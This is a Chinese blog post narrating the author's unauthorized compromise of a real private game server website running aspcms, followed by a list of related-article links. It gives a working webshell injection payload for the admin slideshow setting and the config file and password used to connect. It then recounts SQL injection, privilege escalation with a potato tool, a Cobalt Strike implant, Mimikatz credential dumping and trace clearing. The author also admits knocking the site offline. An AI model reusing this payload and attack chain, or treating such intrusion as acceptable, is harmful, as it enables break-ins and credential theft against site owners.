记一次游戏私服getshell过程
晚上闲着无聊,想做点事情,用fofa搜了一下站点,想挖几个洞,结果看到了一个游戏私服的宣传网站,我这一看跟我之前搞过的一个站好像是一套源码。就试着想搞一搞,正好记录一下写个文章,废话不多说了,开搞。
传统的游戏宣传页面,没啥东西
试着一下输入了一下这套私服源码的后台目录,果真是一摸一样,跳到后台了~
这套源码用的是aspcms,这版本后台有个文件未验证管理员权限,因此如何人都可以访问,同时该文件对获取参数没有使用自定义的filterPara函数过滤,导致sql注入,但是前提你得需要知道后台的目录,这里就不透露啦~网上关于这个版本的漏洞分析的文章不少。
得到后台账户密码后,我们登录后台
嗯,没错,熟悉的页面~还是那个味!
本来还犯困的我突然精神了,简单的翻了翻后台的各个功能块,上传点基本都没法利用,写死了
aspcms在老版本中可以通过添加模板直接添加asp.但是新版的aspcms中已经限制了添加模板的格式为html,js,css,当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.可是如果遇到iis7.5,这方法就不好用了
真巧,我们这个还就是IIS7.5
不要慌,我这里还有用一种拿shell的方法,也是之前看到过某位表哥的文章学习到的
进入后台,“扩展功能”–“幻灯片设置”–”幻灯样式”
使用浏览器的F12的开发者调试工具,将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%
按道理讲其实这一步操作完,直接用菜刀连接/config/AspCms_Config.asp这个配置文件,密码为a就可以getshell了,但是由于我手残,也可能是太晚了脑子不清醒,我把内容输错了,服务器配置文件出错了,导致服务器500了
这怎么办,加了一下他们的游戏群,或许管理员应该会修复吧。
第二天一起床,先看了一下群消息,果不其然,群内好多吐槽的,我也跟着吐槽了一下,其实希望管理员快点修复
发完这句话,心中默念了三句(对不起,对不起,对不起)
下午回家后,看了一眼群消息
太棒了,给管理员点个赞,网站修好了,按照同样的步骤,我一个字母一个字母的操作,终于用菜刀连接上了,还好没出错,再搞崩了我就没心态了
执行了一下whoami,权限太低,需要提权
tasklist查看了一下进程,没有杀软。只有一些游戏管理工具跟常用的服务软件
朋友说应该可以直接用土豆提权,上传了一个土豆提权工具,执行了一下whoami,system,可以
服务器开启cs服务,本地登录客户端,开启监听,生成了一个cs马
上传到服务器直接利用土豆运行一下
成功上线,system权限。
时间不早了,利用MImikatz读取服务器登录密码,成功登录服务器,截了个图,把痕迹清理一下,就不乱动他的东西了。睡觉~
最后一句,大佬绕道,勿喷。
记一次游戏私服getshell过程相关推荐
- dldl游戏私服重构
1.重建游戏私服(评判标准:可以进行正常游戏),并将重建过程完全记录 (注意:所需环境均已经给定,无需网络下载) 这类题目如果直接手工去起,难度非常大,但是要这么想,我们遇到的题一定是简单的,我们遇到 ...
- 越过游戏服务器修改,“撬锁”实战:绕过云锁提权某游戏私服
原标题:"撬锁"实战:绕过云锁提权某游戏私服 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径. 前言 朋友给我了我一个游戏私服的shell,说是提权不下服务器,让我帮忙看看. ...
- LeetCode-笔记-45.跳跃游戏II-贪心算法
LeetCode-笔记-45.跳跃游戏II-贪心算法 给定一个非负整数数组,你最初位于数组的第一个位置. 数组中的每个元素代表你在该位置可以跳跃的最大长度. 你的目标是使用最少的跳跃次数到达数组的最后 ...
- 记一次mysql性能优化过程
2019独角兽企业重金招聘Python工程师标准>>> 转发自:记一次mysql性能优化过程 由于配置是运行过那么长时间,很稳定,基本上不考虑,所以本次主要是sql的优化,并且集中在 ...
- 【BUG记录】记一次游戏越来越卡的BUG
[BUG记录]记一次游戏越来越卡的BUG U3D的MOBA项目,测试过程中,10分钟以后,游戏帧率开始缓慢下降,约3-5分钟后,由60帧下降到小于10帧,编辑器模式. 打开profiler,看到CPU ...
- mysql还书过程_记一次安装 MySQL 的过程
记一次安装 MySQL 的过程 一直以来我用的 MySQL 都是从官网下载的zip压缩包,解压后自己配置的.但是这次安装时遇到了几个坑,特别在这里记录一下. 再次更新, 今天安装 MySQL 8.0. ...
- java斗地主随机发牌_使用Java实现斗地主游戏的发牌过程
package com.review.test; import java.util.ArrayList; import java.util.Collections; import java.util. ...
- 架设游戏私服——内网穿透工具frp
架设游戏私服--内网穿透frp 1. 服务端 2. 客户端 3. exe消失之谜 适用场景: 拥有一台云服务器服务商提供的拥有公网ip的低配服务器. 拥有一台高配家用机,但是位于动态ip的家庭网络甚至 ...
- 爱快路由游戏私服全开
正好手上有闲置的几台主机.正好开了宽带.正好我是个爱打游戏的人.那为什么不让它们跑起来呢? 主机配置要求: CPU & 主板X86架构(推荐使用Intel平台主流硬件---Pentium2及以 ...
最新文章
- t6文件服务器怎么设置,t6 修改文件服务器地址
- python3遍历电子表格_python 3读取多个文本写入同一个excel,每个文本对应各自独立的 sheet 页...
- 【IT笔试面试题整理】判断一个树是否是另一个的子树
- ZetCode Python 教程
- P2P穿透四种NAT类型
- arcgis 批量计算几何_ArcGIS数据统计
- 如何将手机轻松投屏电脑?
- cxpacket_如何避免CXPACKET?
- 扫描仪twain驱动是什么_建湖扫描仪卡纸一般多少钱
- 阿里云前端周刊 - 第 37 期
- Bailian3752 走迷宫【BFS】
- 请教 indy 中的 tldUdpServer 如何实现对本地端口6100进行监听!
- 聊聊reactive streams的schedulers 1
- 一些有用的收藏201808
- 计算机网络实验指导书 pdf,计算机网络实验指导书(新版).pdf
- 福昕pdf Acrobat DC pdf 右键菜单注册表
- 利用java的for循环画一棵圣诞树
- PID控制KP.KI.KD用法
- 取关几十个优质公众号,是否可惜?
- Java JNI初体验